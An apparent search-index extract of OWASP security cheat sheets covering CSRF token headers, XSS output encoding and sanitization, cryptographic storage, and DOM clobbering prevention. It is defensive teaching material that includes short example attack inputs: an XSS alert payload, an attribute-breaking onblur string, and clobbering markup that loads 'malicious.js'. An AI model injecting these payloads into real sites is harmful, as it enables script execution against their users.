<script>\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\nvar app = angular.module(\"app\", []);\n\napp.config(['$httpProvider', function ($httpProvider) {\n$httpProvider.defaults.headers.post[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.put[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.patch[\"anti-csrf-token\"] = csrf_token;\n// AngularJS does not create an object for DELETE and TRACE methods by default, and has to be manually created.\n$httpProvider.defaults.headers.delete = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n$httpProvider.defaults.headers.trace = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n}]);\n</script>\n

This code snippet has been tested with AngularJS version 1.7.7.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#axios","title":"Axios","text":"

Axios allows us to set default headers for the POST, PUT, DELETE and PATCH actions.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\naxios.defaults.headers.post['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.put['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.delete['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.patch['anti-csrf-token'] = csrf_token;\n\n// Axios does not create an object for TRACE method by default, and has to be created manually.\naxios.defaults.headers.trace = {}\naxios.defaults.headers.trace['anti-csrf-token'] = csrf_token\n</script>\n

This code snippet has been tested with Axios version 0.18.0.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#jquery","title":"JQuery","text":"

JQuery exposes an API called $.ajaxSetup() which can be used to add the anti-csrf-token header to the AJAX request. API documentation for $.ajaxSetup() can be found here. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

You can configure jQuery to automatically add the token to all request headers by adopting the following code snippet. This provides a simple and convenient CSRF protection for your AJAX based applications:

<script type=\"text/javascript\">\nvar csrf_token = $('meta[name=\"csrf-token\"]').attr('content');\n\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\n\n$.ajaxSetup({\nbeforeSend: function(xhr, settings) {\nif (!csrfSafeMethod(settings.type) && !this.crossDomain) {\nxhr.setRequestHeader(\"anti-csrf-token\", csrf_token);\n}\n}\n});\n</script>\n

This code snippet has been tested with jQuery version 3.3.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#csrf","title":"CSRF","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","title":"Cross Site Scripting Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance to prevent XSS vulnerabilities.

Cross-Site Scripting (XSS) is a misnomer. The name originated from early versions of the attack where stealing data cross-site was the primary focus. Since then, it has extended to include injection of basically any content, but we still refer to this as XSS. XSS is serious and can lead to account impersonation, observing user behaviour, loading external content, stealing sensitive data, and more.

This cheatsheet is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#framework-security","title":"Framework Security","text":"

Fewer XSS bugs appear in applications built with modern web frameworks. These frameworks steer developers towards good security practices and help mitigate XSS by using templating, auto-escaping, and more. That said, developers need to be aware of problems that can occur when using frameworks insecurely such as:

Understand how your framework prevents XSS and where it has gaps. There will be times where you need to do something outside the protection provided by your framework. This is where Output Encoding and HTML Sanitization are critical. OWASP are producing framework specific cheatsheets for React, Vue, and Angular.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy","title":"XSS Defense Philosophy","text":"

For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised.

However, frameworks aren't perfect and security gaps still exist in popular frameworks like React and Angular. Output Encoding and HTML Sanitization help address those gaps.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Output Encoding is recommended when you need to safely display data exactly as a user typed it in. Variables should not be interpreted as code instead of text. This section covers each form of output encoding, where to use it, and where to avoid using dynamic variables entirely.

Start with using your framework\u2019s default output encoding protection when you wish to display data as the user typed it in. Automatic encoding and escaping functions are built into most frameworks.

If you\u2019re not using a framework or need to cover gaps in the framework then you should use an output encoding library. Each variable used in the user interface should be passed through an output encoding function. A list of output encoding libraries is included in the appendix.

There are many different output encoding methods because browsers parse HTML, JS, URLs, and CSS differently. Using the wrong encoding method may introduce weaknesses or harm the functionality of your application.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-contexts","title":"Output Encoding for \u201cHTML Contexts\u201d","text":"

\u201cHTML Context\u201d refers to inserting a variable between two basic HTML tags like a <div> or <b>. For example..

<div> $varUnsafe </div>\n

An attacker could modify data that is rendered as $varUnsafe. This could lead to an attack being added to a webpage.. for example.

<div> <script>alert`1`</script> </div> // Example Attack\n

In order to add a variable to a HTML context safely, use HTML entity encoding for that variable as you add it to a web template.

Here are some examples of encoded values for specific characters.

If you're using JavaScript for writing to HTML, look at the .textContent attribute as it is a Safe Sink and will automatically HTML Entity Encode.

&    &amp;\n<    &lt;\n>    &gt;\n\"    &quot;\n'    &#x27;\n
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-attribute-contexts","title":"Output Encoding for \u201cHTML Attribute Contexts\u201d","text":"

\u201cHTML Attribute Contexts\u201d refer to placing a variable in an HTML attribute value. You may want to do this to change a hyperlink, hide an element, add alt-text for an image, or change inline CSS styles. You should apply HTML attribute encoding to variables being placed in most HTML attributes. A list of safe HTML attributes is provided in the Safe Sinks section.

<div attr=\"$varUnsafe\">\n<div attr=\u201d*x\u201d onblur=\u201dalert(1)*\u201d> // Example Attack\n

It\u2019s critical to use quotation marks like \" or ' to surround your variables. Quoting makes it difficult to change the context a variable operates in, which helps prevent XSS. Quoting also significantly reduces the characterset that you need to encode, making your application more reliable and the encoding easier to implement.

If you're using JavaScript for writing to a HTML Attribute, look at the .setAttribute and [attribute] methods which will automatically HTML Attribute Encode. Those are Safe Sinks as long as the attribute name is hardcoded and innocuous, like id or class. Generally, attributes that accept JavaScript, such as onClick, are NOT safe to use with untrusted attribute values.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-javascript-contexts","title":"Output Encoding for \u201cJavaScript Contexts\u201d","text":"

\u201cJavaScript Contexts\u201d refer to placing variables into inline JavaScript which is then embedded in an HTML document. This is commonly seen in programs that heavily use custom JavaScript embedded in their web pages.

The only \u2018safe\u2019 location for placing variables in JavaScript is inside a \u201cquoted data value\u201d. All other contexts are unsafe and you should not place variable data in them.

Examples of \u201cQuoted Data Values\u201d

<script>alert('$varUnsafe\u2019)</script>\n<script>x=\u2019$varUnsafe\u2019</script>\n<div onmouseover=\"'$varUnsafe'\"</div>\n

Encode all characters using the \\xHH format. Encoding libraries often have a EncodeForJavaScript or similar to support this function.

Please look at the OWASP Java Encoder JavaScript encoding examples for examples of proper JavaScript use that requires minimal encoding.

For JSON, verify that the Content-Type header is application/json and not text/html to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-css-contexts","title":"Output Encoding for \u201cCSS Contexts\u201d","text":"

\u201cCSS Contexts\u201d refer to variables placed into inline CSS. This is common when you want users to be able to customize the look and feel of their webpages. CSS is surprisingly powerful and has been used for many types of attacks. Variables should only be placed in a CSS property value. Other \u201cCSS Contexts\u201d are unsafe and you should not place variable data in them.

<style> selector { property : $varUnsafe; } </style>\n<style> selector { property : \"$varUnsafe\"; } </style>\n<span style=\"property : $varUnsafe\">Oh no</span>\n

If you're using JavaScript to change a CSS property, look into using style.property = x. This is a Safe Sink and will automatically CSS encode data in it.

// Add CSS Encoding Advice

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-url-contexts","title":"Output Encoding for \u201cURL Contexts\u201d","text":"

\u201cURL Contexts\u201d refer to variables placed into a URL. Most commonly, a developer will add a parameter or URL fragment to a URL base that is then displayed or used in some operation. Use URL Encoding for these scenarios.

<a href=\"http://www.owasp.org?test=$varUnsafe\">link</a >\n

Encode all characters with the %HH encoding format. Make sure any attributes are fully quoted, same as JS and CSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#common-mistake","title":"Common Mistake","text":"

There will be situations where you use a URL in different contexts. The most common one would be adding it to an href or src attribute of an <a> tag. In these scenarios, you should do URL encoding, followed by HTML attribute encoding.

url = \"https://site.com?data=\" + urlencode(parameter)\n<a href='attributeEncode(url)'>link</a>\n

If you're using JavaScript to construct a URL Query Value, look into using window.encodeURIComponent(x). This is a Safe Sink and will automatically URL encode data in it.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts","title":"Dangerous Contexts","text":"

Output encoding is not perfect. It will not always prevent XSS. These locations are known as dangerous contexts. Dangerous contexts include:

<script>Directly in a script</script>\n<!-- Inside an HTML comment -->\n<style>Directly in CSS</style>\n<div ToDefineAnAttribute=test />\n<ToDefineATag href=\"/test\" />\n

Other areas to be careful of include:

Don't place variables into dangerous contexts as even with output encoding, it will not prevent an XSS attack fully.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization","title":"HTML Sanitization","text":"

Sometimes users need to author HTML. One scenario would be allow users to change the styling or structure of content inside a WYSIWYG editor. Output encoding here will prevent XSS, but it will break the intended functionality of the application. The styling will not be rendered. In these cases, HTML Sanitization should be used.

HTML Sanitization will strip dangerous HTML from a variable and return a safe string of HTML. OWASP recommends DOMPurify for HTML Sanitization.

let clean = DOMPurify.sanitize(dirty);\n

There are some further things to consider:

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#safe-sinks","title":"Safe Sinks","text":"

Security professionals often talk in terms of sources and sinks. If you pollute a river, it'll flow downstream somewhere. It\u2019s the same with computer security. XSS sinks are places where variables are placed into your webpage.

Thankfully, many sinks where variables can be placed are safe. This is because these sinks treat the variable as text and will never execute it. Try to refactor your code to remove references to unsafe sinks like innerHTML, and instead use textContent or value.

elem.textContent = dangerVariable;\nelem.insertAdjacentText(dangerVariable);\nelem.className = dangerVariable;\nelem.setAttribute(safeName, dangerVariable);\nformfield.value = dangerVariable;\ndocument.createTextNode(dangerVariable);\ndocument.createElement(dangerVariable);\nelem.innerHTML = DOMPurify.sanitize(dangerVar);\n

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

For a comprehensive list, check out the DOMPurify allowlist

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#other-controls","title":"Other Controls","text":"

Framework Security Protections, Output Encoding, and HTML Sanitization will provide the best protection for your application. OWASP recommends these in all circumstances.

Consider adopting the following controls in addition to the above.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-prevention-rules-summary","title":"XSS Prevention Rules Summary","text":"

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type Context Code Sample Defense String HTML Body <span>UNTRUSTED DATA </span> HTML Entity Encoding (rule #1). String Safe HTML Attributes <input type=\"text\" name=\"fname\" value=\"UNTRUSTED DATA \"> Aggressive HTML Entity Encoding (rule #2), Only place untrusted data into a list of safe attributes (listed below), Strictly validate unsafe attributes such as background, ID and name. String GET Parameter <a href=\"/site/search?value=UNTRUSTED DATA \">clickme</a> URL Encoding (rule #5). String Untrusted URL in a SRC or HREF attribute <a href=\"UNTRUSTED URL \">clickme</a> <iframe src=\"UNTRUSTED URL \" /> Canonicalize input, URL Validation, Safe URL verification, Allow-list http and HTTPS URLs only (Avoid the JavaScript Protocol to Open a new Window), Attribute encoder. String CSS Value HTML <div style=\"width: UNTRUSTED DATA ;\">Selection</div> Strict structural validation (rule #4), CSS Hex encoding, Good design of CSS Features. String JavaScript Variable <script>var currentValue='UNTRUSTED DATA ';</script> <script>someFunction('UNTRUSTED DATA ');</script> Ensure JavaScript variables are quoted, JavaScript Hex Encoding, JavaScript Unicode Encoding, Avoid backslash encoding (\\\" or \\' or \\\\). HTML HTML Body <div>UNTRUSTED HTML</div> HTML Validation (JSoup, AntiSamy, HTML Sanitizer...). String DOM XSS <script>document.write(\"UNTRUSTED INPUT: \" + document.location.hash );<script/> DOM based XSS Prevention Cheat Sheet"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary","title":"Output Encoding Rules Summary","text":"

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. The following charts details a list of critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type Encoding Mechanism HTML Entity Encoding Convert & to &amp;, Convert < to &lt;, Convert > to &gt;, Convert \" to &quot;, Convert ' to &#x27; HTML Attribute Encoding Except for alphanumeric characters, encode all characters with the HTML Entity &#xHH; format, including spaces. (HH = Hex Value) URL Encoding Standard percent encoding, see here. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL. JavaScript Encoding Except for alphanumeric characters, encode all characters with the \\uXXXX unicode encoding format (X = Integer). CSS Hex Encoding CSS encoding supports \\XX and \\XXXXXX. Using a two character encode can cause problems if the next character continues the encode sequence. There are two solutions: (a) Add a space after the CSS encode (will be ignored by the CSS parser) (b) use the full amount of CSS encoding possible by zero padding the value."},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

XSS Attack Cheat Sheet:

The following article describes how to exploit different kinds of XSS Vulnerabilities that this article was created to help you avoid:

Description of XSS Vulnerabilities:

Discussion on the Types of XSS Vulnerabilities:

How to Review Code for Cross-site scripting Vulnerabilities:

How to Test for Cross-site scripting Vulnerabilities:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html","title":"Cryptographic Storage Cheat Sheet","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article provides a simple model to follow when implementing solutions to protect data at rest.

Passwords should not be stored using reversible encryption - secure password hashing algorithms should be used instead. The Password Storage Cheat Sheet contains further guidance on storing passwords.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#architectural-design","title":"Architectural Design","text":"

The first step in designing any application is to consider the overall architecture of the system, as this will have a huge impact on the technical implementation.

This process should begin with considering the threat model of the application (i.e, who you are trying to protect that data against).

The use of dedicated secret or key management systems can provide an additional layer of security protection, as well as making the management of secrets significantly easier - however it comes at the cost of additional complexity and administrative overhead - so may not be feasible for all applications. Note that many cloud environments provide these services, so these should be taken advantage of where possible. The Secrets Management Cheat Sheet contains further guidance on this topic.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#where-to-perform-encryption","title":"Where to Perform Encryption","text":"

Encryption can be performed on a number of levels in the application stack, such as:

Which layer(s) are most appropriate will depend on the threat model. For example, hardware level encryption is effective at protecting against the physical theft of the server, but will provide no protection if an attacker is able to compromise the server remotely.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#minimise-the-storage-of-sensitive-information","title":"Minimise the Storage of Sensitive Information","text":"

The best way to protect sensitive information is to not store it in the first place. Although this applies to all kinds of information, it is most often applicable to credit card details, as they are highly desirable for attackers, and PCI DSS has such stringent requirements for how they must be stored. Wherever possible, the storage of sensitive information should be avoided.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms","title":"Algorithms","text":"

For symmetric encryption AES with a key that's at least 128 bits (ideally 256 bits) and a secure mode should be used as the preferred algorithm.

For asymmetric encryption, use elliptical curve cryptography (ECC) with a secure curve such as Curve25519 as a preferred algorithm. If ECC is not available and RSA must be used, then ensure that the key is at least 2048 bits.

Many other symmetric and asymmetric algorithms are available which have their own pros and cons, and they may be better or worse than AES or Curve25519 in specific use cases. When considering these, a number of factors should be taken into account, including:

In some cases there may be regulatory requirements that limit the algorithms that can be used, such as FIPS 140-2 or PCI DSS.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms","title":"Custom Algorithms","text":"

Don't do this.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#cipher-modes","title":"Cipher Modes","text":"

There are various modes that can be used to allow block ciphers (such as AES) to encrypt arbitrary amounts of data, in the same way that a stream cipher would. These modes have different security and performance characteristics, and a full discussion of them is outside the scope of this cheat sheet. Some of the modes have requirements to generate secure initialisation vectors (IVs) and other attributes, but these should be handled automatically by the library.

Where available, authenticated modes should always be used. These provide guarantees of the integrity and authenticity of the data, as well as confidentiality. The most commonly used authenticated modes are GCM and CCM, which should be used as a first preference.

If GCM or CCM are not available, then CTR mode or CBC mode should be used. As these do not provide any guarantees about the authenticity of the data, separate authentication should be implemented, such as using the Encrypt-then-MAC technique. Care needs to be taken when using this method with variable length messages

ECB should not be used outside of very specific circumstances.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#random-padding","title":"Random Padding","text":"

For RSA, it is essential to enable Random Padding. Random Padding is also known as OAEP or Optimal Asymmetric Encryption Padding. This class of defense protects against Known Plain Text Attacks by adding randomness at the beginning of the payload.

The Padding Schema of PKCS#1 is typically used in this case.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation","title":"Secure Random Number Generation","text":"

Random numbers (or strings) are needed for various security critical functionality, such as generating encryption keys, IVs, session IDs, CSRF tokens or password reset tokens. As such, it is important that these are generated securely, and that it is not possible for an attacker to guess and predict them.

It is generally not possible for computers to generate truly random numbers (without special hardware), so most systems and languages provide two different types of randomness.

Pseudo-Random Number Generators (PRNG) provide low-quality randomness that are much faster, and can be used for non-security related functionality (such as ordering results on a page, or randomising UI elements). However, they must not be used for anything security critical, as it is often possible for attackers to guess or predict the output.

Cryptographically Secure Pseudo-Random Number Generators (CSPRNG) are designed to produce a much higher quality of randomness (more strictly, a greater amount of entropy), making them safe to use for security-sensitive functionality. However, they are slower and more CPU intensive, can end up blocking in some circumstances when large amounts of random data are requested. As such, if large amounts of non-security related randomness are needed, they may not be appropriate.

The table below shows the recommended algorithms for each language, as well as insecure functions that should not be used.

Language Unsafe Functions Cryptographically Secure Functions C random(), rand() getrandom(2) Java java.util.Random() java.security.SecureRandom PHP rand(), mt_rand(), array_rand(), uniqid() random_bytes(), random_int() in PHP 7 or openssl_random_pseudo_bytes() in PHP 5 .NET/C# Random() RandomNumberGenerator Objective-C arc4random() (Uses RC4 Cipher) SecRandomCopyBytes Python random() secrets() Ruby Random SecureRandom Go rand using math/rand package crypto.rand package Rust rand::prng::XorShiftRng rand::prng::chacha::ChaChaRng and the rest of the Rust library CSPRNGs. Node.js Math.random() crypto.randomBytes, crypto.randomInt, crypto.randomUUID"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#uuids-and-guids","title":"UUIDs and GUIDs","text":"

Universally unique identifiers (UUIDs or GUIDs) are sometimes used as a quick way to generate random strings. Although they can provide a reasonable source of randomness, this will depend on the type or version of the UUID that is created.

Specifically, version 1 UUIDs are comprised of a high precision timestamp and the MAC address of the system that generated them, so are not random (although they may be hard to guess, given the timestamp is to the nearest 100ns). Type 4 UUIDs are randomly generated, although whether this is done using a CSPRNG will depend on the implementation. Unless this is known to be secure in the specific language or framework, the randomness of UUIDs should not be relied upon.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#defence-in-depth","title":"Defence in Depth","text":"

Applications should be designed to still be secure even if cryptographic controls fail. Any information that is stored in an encrypted form should also be protected by additional layers of security. Application should also not rely on the security of encrypted URL parameters, and should enforce strong access control to prevent unauthorised access to information.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-management","title":"Key Management","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#processes","title":"Processes","text":"

Formal processes should be implemented (and tested) to cover all aspects of key management, including:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-generation","title":"Key Generation","text":"

Keys should be randomly generated using a cryptographically secure function, such as those discussed in the Secure Random Number Generation section. Keys should not be based on common words or phrases, or on \"random\" characters generated by mashing the keyboard.

Where multiple keys are used (such as data separate data-encrypting and key-encrypting keys), they should be fully independent from each other.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-lifetimes-and-rotation","title":"Key Lifetimes and Rotation","text":"

Encryption keys should be changed (or rotated) based on a number of different criteria:

Once one of these criteria have been met, a new key should be generated and used for encrypting any new data. There are two main approaches for how existing data that was encrypted with the old key(s) should be handled:

  1. Decrypting it and re-encrypting it with the new key.
  2. Marking each item with the ID of the key that was used to encrypt it, and storing multiple keys to allow the old data to be decrypted.

The first option should generally be preferred, as it greatly simplifies both the application code and key management processes; however, it may not always be feasible. Note that old keys should generally be stored for a certain period after they have been retired, in case old backups of copies of the data need to be decrypted.

It is important that the code and processes required to rotate a key are in place before they are required, so that keys can be quickly rotated in the event of a compromise. Additionally, processes should also be implemented to allow the encryption algorithm or library to be changed, in case a new vulnerability is found in the algorithm or implementation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-storage","title":"Key Storage","text":"

Securely storing cryptographic keys is one of the hardest problems to solve, as the application always needs to have some level of access to the keys in order to decrypt the data. While it may not be possible to fully protect the keys from an attacker who has fully compromised the application, a number of steps can be taken to make it harder for them to obtain the keys.

Where available, the secure storage mechanisms provided by the operating system, framework or cloud service provider should be used. These include:

There are many advantages to using these types of secure storage over simply putting keys in configuration files. The specifics of these will vary depending on the solution used, but they include:

In some cases none of these will be available, such as in a shared hosting environment, meaning that it is not possible to obtain a high degree of protection for any encryption keys. However, the following basic rules can still be followed:

The Secrets Management Cheat Sheet provides more details on securely storing secrets.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#separation-of-keys-and-data","title":"Separation of Keys and Data","text":"

Where possible, encryption keys should be stored in a separate location from encrypted data. For example, if the data is stored in a database, the keys should be stored in the filesystem. This means that if an attacker only has access to one of these (for example through directory traversal or SQL injection), they cannot access both the keys and the data.

Depending on the architecture of the environment, it may be possible to store the keys and data on separate systems, which would provide a greater degree of isolation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#encrypting-stored-keys","title":"Encrypting Stored Keys","text":"

Where possible, encryption keys should themselves be stored in an encrypted form. At least two separate keys are required for this:

For this to be effective, the KEK must be stored separately from the DEK. The encrypted DEK can be stored with the data, but will only be usable if an attacker is able to also obtain the KEK, which is stored on another system.

The KEK should also be at least as strong as the DEK. The envelope encryption guidance from Google contains further details on how to manage DEKs and KEKs.

In simpler application architectures (such as shared hosting environments) where the KEK and DEK cannot be stored separately, there is limited value to this approach, as an attacker is likely to be able to obtain both of the keys at the same time. However, it can provide an additional barrier to unskilled attackers.

A key derivation function (KDF) could be used to generate a KEK from user-supplied input (such a passphrase), which would then be used to encrypt a randomly generated DEK. This allows the KEK to be easily changed (when the user changes their passphrase), without needing to re-encrypt the data (as the DEK remains the same).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html","title":"DOM Clobbering Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

DOM Clobbering is a type of code-reuse, HTML-only injection attack, where attackers confuse a web application by injecting HTML elements whose id or name attribute matches the name of security-sensitive variables or browser APIs, such as variables used for fetching remote content (e.g., script src), and overshadow their value.

It is particularly relevant when script injection is not possible, e.g., when filtered by HTML sanitizers, or mitigated by disallowing or controlling script execution. In these scenarios, attackers may still inject non-script HTML markups into webpages and transform the initially secure markup into executable code, achieving Cross-Site Scripting (XSS).

This cheat sheet is a list of guidelines, secure coding patterns, and practices to prevent or restrict the impact of DOM Clobbering in your web application.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#background","title":"Background","text":"

Before we dive into DOM Clobbering, let's refresh our knowledge with some basic Web background.

When a webpage is loaded, the browser creates a DOM tree that represents the structure and content of the page, and JavaScript code has read and write access to this tree.

When creating the DOM tree, browsers also create an attribute for (some) named HTML elements on window and document objects. Named HTML elements are those having an id or name attribute. For example, the markup:

<form id=x></a>\n

will lead to browsers creating references to that form element with the attribute x of window and document:

var obj1 = document.getElementById('x');\nvar obj2 = document.x;\nvar obj3 = document.x;\nvar obj4 = window.x;\nvar obj5 = x; // by default, objects belong to the global Window, so x is same as window.x\nconsole.log(\nobj1 === obj2 && obj2 === obj3 &&\nobj3 === obj4 && obj4 === obj5\n); // true\n

When accessing an attribute of window and document objects, named HTML element references come before lookups of built-in APIs and other attributes on window and document that developers have defined, also known as named property accesses. Developers unaware of such behavior may use the content of window/document attributes for sensitive operations, such as URLs for fetching remote content, and attackers can exploit it by injecting markups with colliding names. Similarly to custom attributes/variables, built-in browser APIs may be overshadowed by DOM Clobbering.

If attackers are able to inject (non-script) HTML markup in the DOM tree, it can change the value of a variable that the web application relies on due to named property accesses, causing it to malfunction, expose sensitive data, or execute attacker-controlled scripts. DOM Clobbering works by taking advantage of this (legacy) behaviour, causing a namespace collision between the execution environment (i.e., window and document objects), and JavaScript code.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-1","title":"Example Attack 1","text":"
let redirectTo = window.redirectTo || '/profile/';\nlocation.assign(redirectTo);\n

The attacker can:

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-2","title":"Example Attack 2","text":"
var script = document.createElement('script');\nlet src = window.config.url || 'script.js';\ns.src = src;\ndocument.body.appendChild(s);\n

The attacker can inject the markup <a id=config><a id=config name=url href='malicious.js'> to load additional JavaScript code, and obtain arbitrary client-side code execution.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#summary-of-guidelines","title":"Summary of Guidelines","text":"

For quick reference, below is the summary of guidelines discussed next.

Guidelines Description # 1 Use HTML Sanitizers link # 2 Use Content-Security Policy link # 3 Freeze Sensitive DOM Objects link # 4 Validate All Inputs to DOM Tree link # 5 Use Explicit Variable Declarations link # 6 Do Not Use Document and Window for Global Variables link # 7 Do Not Trust Document Built-in APIs Before Validation link # 8 Enforce Type Checking link # 9 Use Strict Mode link # 10 Apply Browser Feature Detection link # 11 Limit Variables to Local Scope link # 12 Use Unique Variable Names In Production link # 13 Use Object-oriented Programming Techniques like Encapsulation link"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#mitigation-techniques","title":"Mitigation Techniques","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#1-html-sanitization","title":"#1: HTML Sanitization","text":"

Robust HTML sanitizers can prevent or restrict the risk of DOM Clobbering. They can do so in multiple ways. For example:

OWASP recommends DOMPurify or the Sanitizer API for HTML sanitization.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#dompurify-sanitizer","title":"DOMPurify Sanitizer","text":"

By default, DOMPurify removes all clobbering collisions with built-in APIs and properties (using the enabled-by-default SANITIZE_DOM configuration option). ]

To be protected against clobbering of custom variables and properties as well, you need to enable the SANITIZE_NAMED_PROPS config:

var clean = DOMPurify.sanitize(dirty, {SANITIZE_NAMED_PROPS: true});\n

This would isolate the namespace of named properties and JavaScript variables by prefixing them with user-content- string.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#sanitizer-api","title":"Sanitizer API","text":"

The new browser-built-in Sanitizer API does not prevent DOM Clobbering it its default setting, but can be configured to remove named properties:

const sanitizerInstance = new Sanitizer({\nblockAttributes: [\n{'name': 'id', elements: '*'},\n{'name': 'name', elements: '*'}\n]\n});\ncontainerDOMElement.setHTML(input, {sanitizer: sanitizerInstance});\n
"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#2-content-security-policy","title":"#2: Content-Security Policy","text":"

Content-Security Policy (CSP) is a set of rules that tell the browser which resources are allowed to be loaded on a web page. By restricting the sources of JavaScript files (e.g., with the script-src directive), CSP can prevent malicious code from being injected into the page.

Note: CSP can only mitigate some varints of DOM clobbering attacks, such as when attackers attempt to load new scripts by clobbering script sources, but not when already-present code can be abused for code execution, e.g., clobbering the parameters of code evaluation constructs like eval().

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#3-freezing-sensitive-dom-objects","title":"#3: Freezing Sensitive DOM Objects","text":"

A simple way to mitigate DOM Clobbering against individual objects could be to freeze sensitive DOM objects and their properties, e.g., via Object.freeze() method.

